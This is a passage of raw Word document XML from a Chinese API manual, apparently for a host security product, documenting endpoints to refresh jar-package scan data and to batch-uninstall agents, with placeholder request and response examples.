      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C199922" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D14986D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jar_pkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2856CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4896E212" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6BA015" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE933C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jar_pkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13740D39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662BF276" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F017FE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379444AA"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4E1B0ABE"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5801BDC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E7804D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D5DD869" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7444122D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="727A46F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="40B147F4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55D9ACB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AC2EDC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4327A45C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62D92D72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C2237CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-jar</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C39D58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>refresh(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jar_pkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26782C23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="_Toc115166150"/>
      <w:bookmarkStart w:id="152" w:name="jar包信息查询扫描状态"/>
      <w:bookmarkEnd w:id="150"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jar</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
    </w:p>
    <w:p w14:paraId="6B41F53B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询jar</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C69D351" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="_Toc115166151"/>
      <w:bookmarkStart w:id="154" w:name="批量卸载agent"/>
      <w:bookmarkEnd w:id="146"/>
      <w:bookmarkEnd w:id="152"/>
      <w:r>
        <w:t>批量卸载Agent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
    </w:p>
    <w:p w14:paraId="62DCA011" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F59D9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于批量卸载指定agent或者批量卸载离线超过七天的agent；您可以灵活的使用该API进行Agent卸载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAC9064" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002C0594" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>卸载主机有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DEA98D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>指定</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AgentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>卸载；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001B5534" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>批量卸载离线超过７天的主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A058A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了1个接口，接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2974B676" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_Toc115166152"/>
      <w:bookmarkStart w:id="156" w:name="卸载主机"/>
      <w:r>
        <w:t>卸载主机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
    </w:p>
    <w:p w14:paraId="7D88A7E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询主机信息，按每台主机进行展示；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9E3D5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A4B064" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostoperation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deletehost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win|unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240FA833"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149"/>
        <w:gridCol w:w="1152"/>
        <w:gridCol w:w="564"/>
        <w:gridCol w:w="7217"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="51EF743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7B46507" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E946F5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F816156" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="717FE134" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="53C4FFC1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A4B14CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D6A426F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5083721E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DBDC1E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7FE15B00" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47946F79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>allOffline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24853F10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26D114F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E1D2A02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否批量删除离线超过7天主机，如果该参数为true，表示要批量删除离线超过</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">七天的主机，忽略 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="00614162" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="036D0BC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0968D597" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15D6B99B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="699B282D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E1609D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t xml:space="preserve"> 注意：如果</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>不为空且</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allOffline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>值为true，会按照指定agent的场景删除对应的主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E838021" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
      <w:r>
        <w:t>批量卸载离线超过7天主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D734C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allOffline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "password":"123456"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C0F7D86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
      <w:r>
        <w:t>批量卸载指定主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194F3401" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["1222222222"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "password":"123456"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E8AD84B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F98651F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostoperation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deletehost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["1222222222"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "password":"123456"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146C5917" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA28087" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "message": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44298539" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回rows部分说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E8AECE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>如果密码错误，则返回结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0486D92D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
